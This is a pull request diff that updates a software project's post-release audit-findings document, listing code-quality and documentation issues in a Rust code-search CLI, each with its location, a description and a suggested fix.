### PR TITLE
chore(audit): v1.30.1 audit artifacts (findings/triage/fix-prompts)

### DIFF
--- a/docs/audit-findings-v1.30.0.md
+++ b/docs/audit-findings-v1.30.0.md
@@ -1,648 +1,726 @@
-# Audit Findings — v1.29.0
+# v1.30.0 Post-Release Audit Findings
 
-Version: 1.29.0 (post-release, commit 04ee9516)
-Date: 2026-04-23
-Categories: 16 across 2 batches of 8 parallel opus auditors.
+Generated: 2026-04-26T20:41:23Z
 
----
+Total: 170 findings across 16 categories.
 
 
 ## Code Quality
 
-#### `BatchProvider::submit_batch` (4-arg) and its 3 impls are dead code — zero production or test callers
+#### `cmd_similar` JSON output emits 3 fields; batch `dispatch_similar` emits 9 — silent parity drop in the canonical SearchResult shape
 - **Difficulty:** easy
-- **Location:** `src/llm/provider.rs:27-33` (trait method), `src/llm/batch.rs:378-387` (LlmClient impl), `src/llm/provider.rs:100-108` (MockBatchProvider), `src/llm/provider.rs:164-172` (DefaultValidationProvider)
-- **Description:** The `BatchProvider` trait declares `submit_batch(items, max_tokens, purpose, prompt_builder)` as a first-class method and three impls (including the production `LlmClient` one) faithfully implement it. Grepping `\.submit_batch\b(` across the crate returns zero call sites. All three real batch flows (summary, hyde, doc-comment) go through closures that call `submit_batch_prebuilt` / `submit_doc_batch` / `submit_hyde_batch` (see `src/llm/summary.rs:121`, `src/llm/hyde.rs:86`, `src/llm/doc_comments.rs:281`). The 4-arg trait method exists only as a shape for future callers that never came — it's carrying roughly 60 lines of impl code, a matching `submit_batch_inner` adapter in `LlmClient`, and the `prompt_builder: fn(&str, &str, &str) -> String` type parameter in the trait. Dead weight that blocks cleanup of the `BatchProvider` API and keeps the trait from being a narrow contract that matches actual usage.
-- **Suggested fix:** Delete `BatchProvider::submit_batch` from the trait, delete the three impls (`src/llm/batch.rs:378-387`, `src/llm/provider.rs:100-108`, `src/llm/provider.rs:164-172`), and delete `LlmClient::submit_batch_inner`'s 4-arg wrapping logic if nothing else consumes it after the trait shrinks. Leaves `submit_batch_prebuilt` / `submit_doc_batch` / `submit_hyde_batch` as the real contract.
+- **Location:** `src/cli/batch/handlers/info.rs:139-148` (batch path), vs `src/cli/display.rs:397-413` (CLI path via `display_similar_results_json`) which routes through `cqs::store::SearchResult::to_json()` at `src/store/helpers/types.rs:143-156`
+- **Description:** The CLI `cmd_similar` json branch calls `display_similar_results_json` → `r.to_json()`, which emits the canonical 9-field shape (`file, line_start, line_end, name, signature, language, chunk_type, score, content, has_parent`). The comment at display.rs:401-402 explicitly says "Delegate to SearchResult::to_json() for canonical base keys. Previously missing `type` and `has_parent` (CQ-NEW-5)." The batch path's `dispatch_similar` re-rolls JSON inline as `{name, file, score}` — only 3 fields, missing line numbers, signature, language, chunk_type, content, has_parent. Net effect: agents get a different schema for `cqs similar Foo` depending on whether the daemon is up. CQ-V1.29-3 fixed the *resolution* divergence here; this is the JSON-shape sister bug, same source.
+- **Suggested fix:** In `dispatch_similar` at `src/cli/batch/handlers/info.rs:139-148`, replace the manual `serde_json::json!` map with `filtered.iter().map(|r| r.to_json()).collect::<Vec<_>>()`. Same line count, same envelope (`{results, target, total}`), now schema-identical to the CLI path. Add a snapshot test that asserts CLI and batch produce identical key sets for the same query.
 
-#### `cmd_scout` uses `build_scout_output` but `dispatch_scout` duplicates the logic inline — the "shared" helper isn't shared
+#### `Reranker::new` silently ignores the `[reranker]` config section — `resolve_reranker(None)` is the only call site
 - **Difficulty:** easy
-- **Location:** `src/cli/commands/search/scout.rs:26-38` (the "shared" helper), `src/cli/batch/handlers/misc.rs:185-196` (the inline duplicate)
-- **Description:** The docstring on `build_scout_output` explicitly says "shared between CLI and batch" and references CQ-V1.25-7 for the drift-risk rationale: "so the shape stays identical across the two dispatch paths." But only `cmd_scout` (src/cli/commands/search/scout.rs:68) calls it. `dispatch_scout` rolls its own: manually calls `serde_json::to_value(&result)`, then `inject_content_into_scout_json`, then `inject_token_info`. The current happy-path output is identical by coincidence — any change to `build_scout_output` (e.g. a new field, a new injection order, a span, error handling) will silently diverge between CLI and daemon socket, which is the exact regression the helper was introduced to prevent. `grep -rn "build_scout_output" src/` shows 0 batch callers; this is the same gap that bit `build_batched_with_dim` pre-v0.9.0 ("configurable models disaster" in CLAUDE.md).
-- **Suggested fix:** In `src/cli/batch/handlers/misc.rs:185-196`, replace the inline sequence with a single call to `crate::cli::commands::search::scout::build_scout_output(&result, content_map.as_ref(), token_info)`. Either re-export or change the visibility so the batch handler can reach it (currently `pub(crate)`). Same pattern as `build_related_output` / `build_where_output` already use.
+- **Location:** `src/reranker.rs:127-154` (`Reranker::new`), `src/reranker.rs:61-77` (`resolve_reranker`), `src/reranker.rs:442-446` (`model_paths` calls `resolve_reranker(None)`)
+- **Description:** `resolve_reranker` is the entire precedence chain documented at `:59-60`: "CLI → `CQS_RERANKER_MODEL` → `[reranker] model_path` → `[reranker] preset` → hardcoded `ms-marco-minilm`." Its signature accepts `section: Option<&AuxModelSection>` to thread `Config::reranker` (defined at `src/config.rs:228`) into the resolver. But `model_paths` always passes `None`. `Reranker::new()` doesn't accept a config at all; it only reads `CQS_RERANKER_MAX_LENGTH` and `CQS_RERANKER_MODEL` (via env inside resolve_reranker). Net effect: a user who writes `[reranker] preset = "bge-reranker-base"` in `.cqs.toml` gets the default ms-marco-MiniLM with zero error or warning — silent config drop, exactly the class of bug CLAUDE.md flags as "Docs Lying Is P1." The `section` parameter on `resolve_reranker` is also dead code as long as the only caller passes `None`.
+- **Suggested fix:** Add `Reranker::with_section(section: Option<&AuxModelSection>)` (or change `new` to accept it) and thread `&config.reranker` through from the two production call sites (`src/cli/batch/mod.rs:1274`, `src/cli/store.rs:276` — both already have `Config` in scope). Inside `model_paths`, store the section on `self` (or pass through) and call `resolve_reranker(self.section.as_ref())` instead of `None`. Same pattern SPLADE already uses.
 
-#### `cmd_similar` has a private `resolve_target` that silently diverges from `cqs::resolve_target` used by the batch path
+#### `dispatch_diff` builds a `target_store` placeholder that's never read in its else branch
 - **Difficulty:** easy
-- **Location:** `src/cli/commands/search/similar.rs:16-39` (CLI-only local helper), `src/search/mod.rs:47-94` (library function used by batch)
-- **Description:** `cmd_similar` defines its own `resolve_target` local helper (line 16) that calls `store.search_by_name(func_name, 20)` then picks `results[0]` when no file filter matches. The library's `cqs::resolve_target` (which `dispatch_similar` at `src/cli/batch/handlers/info.rs:113` uses, and `cmd_neighbors` at `src/cli/commands/search/neighbors.rs:181` uses, and the helper wrapper at `src/cli/commands/resolve.rs:19-22` uses) differs in two load-bearing ways: (1) it prefers non-test chunks when names are ambiguous (lines 83-93) — the local helper always picks `results[0]`; (2) on file-filter miss it returns a structured `StoreError::NotFound` with a "Found in: foo.rs, bar.rs, baz.rs" hint (lines 68-81) — the local helper silently falls back to `results[0]`. Net effect: `cqs similar Foo` via CLI may return a test chunk or silently pick the wrong file, while `echo 'similar Foo' | cqs batch` returns the non-test chunk with a helpful error for typo'd file filters. The duplication also means any future fix to one won't reach the other.
-- **Suggested fix:** Delete the local `resolve_target` fn in `src/cli/commands/search/similar.rs:16-39` and replace its one call site (line 59) with `cqs::resolve_target(store, name)?` (or `crate::cli::commands::resolve::resolve_target`, which wraps it with anyhow context). The local `parse_target` import on line 13 becomes unused — drop it.
+- **Location:** `src/cli/batch/handlers/misc.rs:354-364, 367-387`
+- **Description:** Lines 354-364 set `target_store` via `if/else`. The `if target_label == "project"` arm correctly captures `&ctx.store()`. The `else` arm calls `ctx.get_ref(target_label)?` (caches the reference store in BatchContext), then sets `target_store = &ctx.store()` with a comment "placeholder -- replaced below." But "below" at lines 367-387 is a *second* `if target_label == "project"` that only consumes `target_store` in the project branch. The else branch at line 376-387 never reads `target_store` — it calls `resolve_reference_store` afresh at line 378, opening yet another Store handle and bypassing the `get_ref` cache that line 360 just populated. So: (1) wasted I/O — the `get_ref` cached store is loaded then discarded; (2) dead-variable initialization in else; (3) a duplicate match on `target_label` that's structurally inevitable. Easy to misread and easy to break the cache invariant on the next refactor.
+- **Suggested fix:** Collapse to one match. Either: (a) use `get_ref` + `borrow_ref` for both project and ref targets, since `borrow_ref` returns `Option<RefMut<RefIndex>>` and you can take `&store` from inside the borrow's scope — `cqs::semantic_diff` is fully synchronous and the borrow lives long enough; or (b) drop the `get_ref` call entirely from the else branch and let `resolve_reference_store` own the lifetime, removing the placeholder. Either way: one `if target_label == "project"` block, no placeholder variable.
 
-#### Risk thresholds duplicated in `cmd_affected`: `overall_risk_label` (JSON) and inline text path use identical cutoffs independently
+#### Hardcoded "200" in user-facing gather warning lies when `CQS_GATHER_MAX_NODES` is set
 - **Difficulty:** easy
-- **Location:** `src/cli/commands/review/affected.rs:92-100` (`overall_risk_label` for JSON), `src/cli/commands/review/affected.rs:143-149` (inline text-path ladder)
-- **Description:** Both pieces of code compute the same risk banding — `>10 callers or >5 changed → high`, `>3 callers or >2 changed → medium`, else `low` — but from independent code paths. The JSON path emits string literals ("high" / "medium" / "low"); the text path emits `RiskLevel` enum variants then colors them via `risk_label`. Change one threshold and the two surfaces disagree silently. Separately, `empty_affected_json` at line 82-90 hardcodes `"overall_risk": "none"` — a fourth string that `overall_risk_label` never produces, so JSON consumers see "low" vs "none" distinction that only the empty-path emits. One bug waiting to happen every time someone tunes the cutoffs.
-- **Suggested fix:** Extract a single `overall_risk(result: &DiffImpactResult) -> RiskLevel` (or `RiskLevel::from_diff_impact(...)` on the library enum) that both paths call. JSON path calls `.to_string()` or a dedicated `risk_level_json_label` and the text path wraps it in `risk_label(level)`. Decide whether "no changes" should be `RiskLevel::Low` or introduce a `RiskLevel::None` variant and fold `empty_affected_json` through the same function. Same change applies to any future `cmd_ci` / `cmd_review` that needs to emit a risk score.
+- **Location:** `src/cli/commands/search/gather.rs:200` (the println), `src/gather.rs:153-172` (`gather_max_nodes` with env override)
+- **Description:** The text-mode warning is `println!("{}", "Warning: expansion capped at 200 nodes".yellow());` — a string literal. The actual cap is `gather_max_nodes()` which honors `CQS_GATHER_MAX_NODES` (logged at gather.rs:161 as "BFS node cap overridden via CQS_GATHER_MAX_NODES"). With `CQS_GATHER_MAX_NODES=500` the user sees "capped at 200" while results were actually capped at 500 — directly contradicts the env var the same module advertises in its tracing message. This is the exact "limit advertised ≠ limit applied" footgun that bites agents debugging "why am I getting only X results."
+- **Suggested fix:** Either capture the cap on `GatherResult` (add `pub expansion_cap_used: usize` next to `expansion_capped`) and format the message with the real number, or look up `gather_max_nodes()` again at warn time. Latter is simpler and `gather_max_nodes` already memoizes via OnceLock. Prefer the former because it makes the cap visible in `--json` output too, where agents can react to it.
 
-#### "Empty impact diff" JSON object duplicated across 3 files, 4 sites — with a silent field-count drift
+#### Embedding/Query cache `open_with_runtime` are ~80% copy-paste — 90+ duplicated lines in cache.rs
+- **Difficulty:** medium
+- **Location:** `src/cache.rs:103-220` (`EmbeddingCache::open_with_runtime`) and `src/cache.rs:1412-1522` (`QueryCache::open_with_runtime`)
+- **Description:** Both methods do, in identical order: (1) `info_span!`, (2) `create_dir_all` parent + `#[cfg(unix)] set_permissions(parent, 0o700)` with identical "best effort" warn block (16 lines × 2), (3) Tokio runtime fallback (`if let Some(rt) = runtime { rt } else { Builder::new_current_thread()... }` — 9 lines × 2), (4) `SqliteConnectOptions` + `SqlitePoolOptions::new().max_connections(1).idle_timeout(30s).connect_with(opts)` — only `busy_timeout(5000 vs 2000)` differs, (5) `CREATE TABLE IF NOT EXISTS` (different schemas), (6) `0o600` chmod loop on `["", "-wal", "-shm"]` with identical comment shape (22 lines × 2). Total: ~90 lines duplicated. The two `Drop` impls (`:723-754`, `:1717-1745`) repeat the same panic-message extraction (4 lines × 2). Bug surface: any future hardening of the chmod block, or change to runtime construction, has to be applied twice. PB-V1.29-7 already noticed both blocks separately — the extracted helper is the structural fix.
+- **Suggested fix:** Extract three private helpers in `cache.rs` (or `store/helpers/sql.rs` next to `busy_timeout_from_env`): `prepare_cache_dir_perms(parent: &Path)` (parent chmod), `apply_db_file_perms(path: &Path)` (the 0o600 loop), and `connect_cache_pool(path, busy_ms, runtime, schema_sql)` (the 4-step open). Both `EmbeddingCache::open_with_runtime` and `QueryCache::open_with_runtime` collapse to ~30 lines each. The two `Drop` impls share `extract_panic_msg(payload)` — same shape as the existing `cli/pipeline/mod.rs::panic_message` (see next finding).
+
+#### `panic_message` helper duplicated 4 ways across 3 modules — `cli/pipeline/mod.rs::panic_message` and 3 inline copies in Drop impls
 - **Difficulty:** easy
-- **Location:** `src/cli/batch/handlers/graph.rs:402-407` and `:412-417` (inline in `dispatch_impact_diff`), `src/cli/commands/graph/impact_diff.rs:12-19` (`empty_impact_json`), `src/cli/commands/review/affected.rs:82-90` (`empty_affected_json`, + `overall_risk` field)
-- **Description:** Four places all hand-roll the same `{ "changed_functions": [], "callers": [], "tests": [], "summary": { "changed_count": 0, "caller_count": 0, "test_count": 0 } }` object. Three are byte-identical; the fourth (`empty_affected_json`) adds `"overall_risk": "none"`. If `DiffImpactResult`'s serialized shape gains a new field (e.g. a `stale_count` counter, a `truncated` flag — note the P2 #32 surrounding work already added `truncated` to the real path), the empty path will diverge from the populated path on three commands (`cqs affected`, `cqs impact-diff`, `cqs batch impact-diff`). Agents and CI scripts parsing these will hit missing-field errors depending on whether the diff had hunks or not.
-- **Suggested fix:** Add `DiffImpactResult::empty()` (or `diff_impact_empty_json()` next to `diff_impact_to_json`) in `src/impact/` and use it from all four sites. Make `cmd_affected` tack on `"overall_risk"` via the shared `overall_risk` helper (per previous finding). Then deleting fields from the populated JSON automatically removes them from the empty JSON too.
+- **Location:** `src/cli/pipeline/mod.rs:223-232` (`fn panic_message`), `src/store/mod.rs:1322-1326` (Store::drop), `src/cache.rs:743-747` (EmbeddingCache::drop), `src/cache.rs:1735-1739` (QueryCache::drop)
+- **Description:** Four copies of the same `payload.downcast_ref::<&str>().or(downcast_ref::<String>()).unwrap_or("unknown panic")` extraction. The pipeline version is a free function; the three Drop versions inline it. Functions return `String` vs `&str`, but the logic is identical. Anyone tightening the panic-extraction (e.g. adding `Box<dyn Error>` or a `format!` of the type id when both downcasts fail) has to update four sites. Low-risk debt but easy to delete.
+- **Suggested fix:** Promote `panic_message` to `pub(crate) fn` in a single common module (`src/lib.rs` next to `temp_suffix`, or a new `src/panic_msg.rs`). Make all four sites use it. The Drop sites currently take `&Box<dyn Any + Send>`; harmonize on that signature so all callers fit. Drop the pipeline-private version.
 
-#### `cqs doctor` reports the compile-time `MODEL_NAME` constant as the index's "metadata" model — silently wrong after `cqs model swap`
+#### Repeated `match std::env::var("CQS_*") { Ok(v) => v.parse()... }` pattern at 25+ sites — `limits::parse_env_*` helpers exist but are pub(crate)-private
+- **Difficulty:** medium
+- **Location:** `src/limits.rs:230-260` (`parse_env_f32` / `parse_env_usize` / `parse_env_u64`); duplicated open-coded equivalents in: `src/cli/watch.rs:65,74,100,498,510,766,942,1430` (8 sites), `src/llm/mod.rs:176,315,406,434` (4 sites), `src/cli/pipeline/types.rs:80,98,117,144` (4 sites), `src/hnsw/persist.rs:19,41,63` (3 sites), `src/embedder/models.rs:565,571`, `src/embedder/mod.rs:330`, `src/cache.rs:206,1509`, `src/gather.rs:156`, `src/cli/commands/graph/trace.rs:357`, `src/impact/bfs.rs:16`, `src/reranker.rs:129`
+- **Description:** The library limits module (`src/limits.rs:224`) clearly notes "shared parsing helpers" with three carefully-tested fns covering `f32 / usize / u64` shapes. They reject zero, garbage, and non-finite values uniformly, with consistent test coverage. But the helpers are `pub(crate)` — visible only inside `cqs::limits` callers. Every other module that wants the same behavior re-rolls the pattern, frequently with slight variations: some accept `0`, some don't; some warn on bad input, most don't; some clamp, some don't. `EmbeddingCache::open_with_runtime` accepts `CQS_CACHE_MAX_SIZE=0` (silently sets cap to 0 → always-evict mode), while `QueryCache` rejects `0` (`.filter(|&n: &u64| n > 0)`) and falls back to default. Same env-shape, opposite behavior. Standardizing fixes this and shrinks the codebase ~150 lines. (See related finding on `CQS_CACHE_MAX_SIZE` zero-handling below.)
+- **Suggested fix:** Move `parse_env_usize` / `_u64` / `_f32` to `src/lib.rs` (or new `src/env.rs`) as `pub fn`, add a `parse_env_duration_secs` variant for `Duration` cases (`local_timeout` etc.), and do a focused sweep replacing the open-coded sites. Drop the `limits.rs` private copies, re-export from there for convenience. One `pub fn` change + ~25 site edits.
+
+#### `EmbeddingCache::open_with_runtime` accepts `CQS_CACHE_MAX_SIZE=0`; `QueryCache::open_with_runtime` rejects it — opposite behavior for sister env vars
 - **Difficulty:** easy
-- **Location:** `src/cli/commands/infra/doctor.rs:144-147, 155-156` (text + check-record)
-- **Description:** `cmd_doctor` formats the model line as `"{} Model: {} (metadata: {})"` where the second placeholder is `cqs::embedder::model_repo()` (what the runtime resolves to) and the third is `cqs::store::MODEL_NAME` — a `pub const` that expands to `ModelConfig::DEFAULT_REPO` at compile time (`src/store/mod.rs:126`, `src/store/helpers/mod.rs:97`). Labeling it `metadata:` implies it was read from the store's metadata table, but it's actually identical to the hardcoded default on every invocation. If someone ran `cqs init --model v9-200k`, or `cqs model swap`, or pointed at an older index, doctor will confidently report that the index metadata matches BGE-large even when the store's `model_name` row says `sentence-transformers/mpnet-base` or `v9-200k`. `Store::stored_model_name()` (src/store/metadata.rs:152) is the correct source and exists. This is the same compile-time-constant-masquerading-as-live-state shape as the "configurable models disaster" that CLAUDE.md flags.
-- **Suggested fix:** In `src/cli/commands/infra/doctor.rs` around line 137-158, open the store (read-only is fine — doctor already opens it for the index check) and call `store.stored_model_name()`. Display that with `.unwrap_or("unset")` as the `metadata:` value. If the stored name differs from `model_repo()`, promote the check-record from `ok` to a warning so doctor flags the mismatch instead of hiding it. Drop the `cqs::store::MODEL_NAME` reference; it's only meaningful inside `check_model_version_with` (itself `#[cfg(test)]`).
+- **Location:** `src/cache.rs:206-209` (Embedding, no zero filter), `src/cache.rs:1509-1513` (Query, `.filter(|&n: &u64| n > 0)`)
+- **Description:** Side-by-side in the same file, two sibling caches handle their `CQS_*_MAX_SIZE` env knob differently. `EmbeddingCache` does `env::var(...).ok().and_then(|s| s.parse().ok()).unwrap_or(10 * 1024^3)` — `CQS_CACHE_MAX_SIZE=0` parses fine to `0`, sets `max_size_bytes = 0`, and `evict()` then aggressively evicts everything to fit under 0 bytes. `QueryCache` adds `.filter(|&n: &u64| n > 0)` so `CQS_QUERY_CACHE_MAX_SIZE=0` falls back to the 100 MB default. Whichever you intended — uniform fallback, or "0 disables the cache" — picking only one accidentally is the wrong outcome. This is the exact class of inconsistency the proposed shared `parse_env_u64` helper above closes.
+- **Suggested fix:** Pick a semantic and document it. If "0 disables": uniformize both to accept 0, document, and have `evict()` short-circuit when `max_size_bytes == 0`. If "0 is invalid, use default": add `.filter(|&n: &u64| n > 0)` to the EmbeddingCache parse at `src/cache.rs:208`. Either way, drive the parse through one helper and write the test once.
 
-Wrote 6 findings to batch1-code-quality.md
----
+#### `cli/commands/resolve.rs::find_reference` and the inline lookup inside `resolve_reference_db` re-roll the same "find ref by name + nice error" twice
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/resolve.rs:26-39` (`find_reference`), `src/cli/commands/resolve.rs:46-57` (inline `references.iter().find(|r| r.name == name)` with byte-identical error message)
+- **Description:** Both functions: (1) call `Config::load(root)`, (2) iterate `config.references`, (3) `.find(|r| r.name == name)`, (4) return `anyhow::anyhow!("Reference '{}' not found. Run 'cqs ref list' to see available references.", name)` on miss. The only difference is `find_reference` returns the full `ReferenceIndex` (loaded via `reference::load_references`), while `resolve_reference_db` only needs the `ReferenceConfig.path`. The error-message duplication is verbatim — change "Run 'cqs ref list'" to anything else and one call site silently lies. Three other call sites across `resolve_reference_store` / `resolve_reference_store_readonly` chain through `resolve_reference_db`, so the bug surfaces on any of them.
+- **Suggested fix:** Extract `find_reference_config(config: &Config, name: &str) -> Result<&ReferenceConfig>` returning the typed config row (no IO, just the find + message). `find_reference` then becomes `let cfg = find_reference_config(&config, name)?; reference::load_references(slice::from_ref(cfg)).into_iter().next().ok_or(...)`; `resolve_reference_db` uses the same helper to read `cfg.path`. One source of truth for the error string.
+
+#### `slot::libc_exdev` hardcodes errno 18 with comment claiming `libc` would be "just for this constant" — but `libc` is already a workspace dep
+- **Difficulty:** easy
+- **Location:** `src/slot/mod.rs:640-647`
+- **Description:** Comment (lines 640-643): "We hardcode 18 (Linux) since `libc::EXDEV` would pull in a libc dep just for this constant. macOS also uses 18; Windows doesn't surface EXDEV the same way." `libc = "0.2"` is in `Cargo.toml` and already imported in `src/cli/watch.rs` (`extern "C" fn on_sigterm(_sig: libc::c_int)`). The hardcode is correct in practice (Linux + macOS both define EXDEV=18; FreeBSD too), but the *justification* is wrong, and a future maintainer reading the comment will assume libc isn't available. Worse, on the unlikely platform where EXDEV diverges (some BSD variants in theory), the hardcoded `18` silently mis-classifies the error and the EXDEV → copy+remove fallback in `move_file` skips. Self-documenting fix: use `libc::EXDEV` and delete the comment.
+- **Suggested fix:** Replace the `fn libc_exdev() -> i32 { 18 }` shim with `libc::EXDEV` directly at the call site in `src/slot/mod.rs:631`. `#[cfg(unix)]` already gates the EXDEV branch implicitly via `raw_os_error()` returning a Linux/macOS errno; the `libc` dep is unconditionally available on those targets through the existing watch.rs usage. Remove the misleading comment.
+
 
 ## Documentation
 
-#### CONTRIBUTING.md Architecture Overview says "Schema v20" but actual is v22
+#### DOC-V1.30-1: PRIVACY.md and SECURITY.md falsely claim `~/.cache/cqs/query_log.jsonl` is opt-in
 - **Difficulty:** easy
-- **Location:** `CONTRIBUTING.md:193,207`
-- **Description:** Two references to schema v20 that are both stale. Line 193 says `store/        - SQLite storage layer (Schema v20, WAL mode)`. Line 207 says `migrations.rs - Schema migration framework (v10-v20, including v19 FK cascade + v20 trigger)`. Actual `CURRENT_SCHEMA_VERSION = 22` in `src/store/helpers/mod.rs:92`. Schema v21 adds `parser_version` column (v1.28.0) and v22 adds `umap_x` / `umap_y` (v1.29.0). These were added after the triage wave-2 docs sweep.
-- **Suggested fix:** Replace `Schema v20` → `Schema v22`, and `v10-v20, including v19 FK cascade + v20 trigger` → `v10-v22, including v19 FK cascade, v20 trigger, v21 parser_version, v22 UMAP coords`.
+- **Location:** `PRIVACY.md:22`, `SECURITY.md:101`, vs `src/cli/batch/commands.rs:371-391` (`log_query`)
+- **Description:** **P1: Docs Lying.** Both docs state the per-user query log is "opt-in, written only when `CQS_TELEMETRY=1` or the file already exists." `log_query` in `src/cli/batch/commands.rs` is called unconditionally from `BatchCmd::Search/Gather/Onboard/Scout/Where/Task` dispatch arms (`commands.rs:418, 441, 477, 487, 491, 513`) and uses `OpenOptions::new().create(true).append(true)` — it creates the file on first batch query regardless of env var or prior file presence. Every `cqs chat` / `cqs batch` user is silently building a search-history file at `~/.cache/cqs/query_log.jsonl` despite the privacy/security docs promising opt-in behaviour. Search queries can contain code snippets, identifiers, internal hostnames.
+- **Suggested fix:** Either gate `log_query` on `std::env::var("CQS_TELEMETRY") == Ok("1")` plus existing-file check (matching the documented contract and the `cli/telemetry.rs::record` pattern), or rewrite both docs to state that the log is unconditional. The privacy contract is the more defensible direction — fix the code, keep the docs.
 
-#### README.md does not document `cqs serve` — v1.29.0 feature invisible to users
-- **Difficulty:** medium
-- **Location:** `README.md` (entire file — no `cqs serve` section)
-- **Description:** v1.29.0 shipped `cqs serve` as a flagship feature (CHANGELOG line 16-20 lists 4 separate `cqs serve` entries; ROADMAP line 9 highlights it; `src/cli/definitions.rs:730-748` defines the command). The README mentions "serve" only 4 times, all of them in context of `cqs watch --serve` (the daemon socket, not the web UI). Users looking at the README have no way to discover the interactive web UI, the 2D/3D toggle, the hierarchy view, the embedding cluster view, the `--port`/`--bind`/`--open` flags, or the `cqs index --umap` prerequisite for the cluster view.
-- **Suggested fix:** Add a `## Web UI (`cqs serve`)` section between "Notes" and "Discovery Tools" (around line 226). Link to `docs/plans/2026-04-21-cqs-serve-v1.md` + `docs/plans/2026-04-22-cqs-serve-3d-progressive.md`. Document the four views, the `--port`/`--bind`/`--open` flags, and the `cqs index --umap` prerequisite for cluster view. Also add `cqs serve` to the "Claude Code Integration" command list starting at `README.md:468`.
-
-#### README.md and CONTRIBUTING.md do not document `.cqsignore` — v1.29.0 feature missing
+#### DOC-V1.30-2: PRIVACY.md claims `query_cache.db` has a 7-day TTL — code only enforces a 100 MiB size cap
 - **Difficulty:** easy
-- **Location:** `README.md`, `CONTRIBUTING.md` (neither mentions `.cqsignore`)
-- **Description:** v1.29.0 shipped `.cqsignore` as an opt-in exclusion mechanism layered on `.gitignore` (CHANGELOG line 21; `src/lib.rs:499-507` adds `wb.add_custom_ignore_filename(".cqsignore")`). 0 matches for `cqsignore` in README or CONTRIBUTING. Only the `Indexing` section mentions "Respects `.gitignore`" without noting that `.cqsignore` is also honored. Users won't discover they can exclude vendored minified JS / eval JSON / etc. without digging into the changelog.
-- **Suggested fix:** In README.md `## Indexing` (line 587), add a sentence: "Also respects `.cqsignore` in the project root for cqs-specific exclusions (same syntax as `.gitignore`, layered on top). Use this for files committed to git but never worth indexing (vendored minified JS, generated fixtures, etc.)."
+- **Location:** `PRIVACY.md:21` vs `src/cache.rs:1536-1606` (`QueryCache::evict`) and `src/cli/batch/mod.rs:1351-1376`
+- **Description:** **P1: Docs Lying.** Privacy doc says "recent query embeddings with a 7-day TTL." There is no time-based TTL anywhere in `QueryCache`. `evict()` looks at `CQS_QUERY_CACHE_MAX_SIZE` (100 MiB default) and trims oldest rows by `ts ASC` only when the disk size exceeds the cap. `prune_older_than(days)` exists but is only invoked by the user-typed `cqs cache prune <days>` command, never automatically. A user who runs `cqs` daily for months will retain every unique search query embedding indefinitely up to the size cap, not for "7 days."
+- **Suggested fix:** Replace the line in PRIVACY.md with: "recent query embeddings, evicted oldest-first when the DB exceeds `CQS_QUERY_CACHE_MAX_SIZE` (100 MiB default). Prune older entries with `cqs cache prune <DAYS>`."
 
-#### SECURITY.md wrong integrity-check default — says opt-out when actually opt-in
+#### DOC-V1.30-3: CHANGELOG v1.30.0 names `CQS_LLM_ENDPOINT` for local LLM provider — actual env var is `CQS_LLM_API_BASE`
 - **Difficulty:** easy
-- **Location:** `SECURITY.md:22`
-- **Description:** The doc says: `**Database corruption**: PRAGMA quick_check(1) on write-mode opens (opt-out via CQS_SKIP_INTEGRITY_CHECK=1). Read-only opens skip the check entirely`. Actual behavior per `src/store/mod.rs:960-962`: `let opt_in = std::env::var("CQS_INTEGRITY_CHECK").as_deref() == Ok("1"); let force_skip = std::env::var("CQS_SKIP_INTEGRITY_CHECK").as_deref() == Ok("1"); let run_check = opt_in && !force_skip && !config.read_only;` — the check is **skipped by default** and opt-in via `CQS_INTEGRITY_CHECK=1`. Comment at 955-959 confirms: "Opt-in via CQS_INTEGRITY_CHECK=1. The quick_check takes ~40s on WSL /mnt/c... For a rebuildable search index the risk/cost tradeoff favors skipping by default." The README env var table (line 722) has this correct (`CQS_INTEGRITY_CHECK | 0 | Set to 1 to enable PRAGMA quick_check on write-mode store opens`); SECURITY.md hasn't been updated.
-- **Suggested fix:** Replace the bullet with: `**Database corruption**: Optional \`PRAGMA quick_check(1)\` on write-mode opens (opt-in via \`CQS_INTEGRITY_CHECK=1\`; disabled by default because the scan takes ~40s on slow filesystems). Read-only opens skip the check entirely — reads cannot introduce corruption and the index is rebuildable via \`cqs index --force\`.`
+- **Location:** `CHANGELOG.md:19`
+- **Description:** v1.30.0 release entry says "`cqs index --llm-summaries` accepts a local OpenAI-compatible endpoint via `CQS_LLM_ENDPOINT`." `CQS_LLM_ENDPOINT` does not exist in the codebase. The actual env vars are `CQS_LLM_PROVIDER=local` plus `CQS_LLM_API_BASE=http://...` (`src/llm/mod.rs:227, 378-385`). README/SECURITY both document `CQS_LLM_API_BASE` correctly. A user copy-pasting the CHANGELOG instructions will get "CQS_LLM_PROVIDER=local requires CQS_LLM_API_BASE" at runtime.
+- **Suggested fix:** Rewrite the line as: "...accepts a local OpenAI-compatible endpoint via `CQS_LLM_PROVIDER=local` + `CQS_LLM_API_BASE=...`." Same fix mirrors how the README env-var table phrases it (`README.md:740-745`).
 
-#### ROADMAP.md lists shipped `cqs serve` under "Parked"
+#### DOC-V1.30-4: CONTRIBUTING.md "Adding a New CLI Command" still tells contributors to add a match arm in `dispatch.rs` — that hasn't been the procedure since #1097
 - **Difficulty:** easy
-- **Location:** `ROADMAP.md:174`
-- **Description:** Line 174 says `- **Graph visualization** (`cqs serve`) — interactive web UI for call graphs, chunk types, impact radius. Spec: `docs/plans/graph-visualization.md`.` — but this is in the `## Parked` section. The same feature is marked shipped on line 184: `| v1.29.0 | **`cqs serve` + `.cqsignore` + slow-tests cron killed.**`. Additionally, the "Done" references `docs/plans/2026-04-22-cqs-serve-3d-progressive.md` as the governing spec, not `graph-visualization.md`. So (1) the parked entry should be removed entirely, and (2) the `graph-visualization.md` reference is to a superseded spec.
-- **Suggested fix:** Delete line 174 (the `Graph visualization` bullet). If `docs/plans/graph-visualization.md` is no longer the working spec, either delete it or add a `SUPERSEDED` note pointing to `2026-04-22-cqs-serve-3d-progressive.md`.
+- **Location:** `CONTRIBUTING.md:339-355` vs `src/cli/registry.rs:1-29` (header doc)
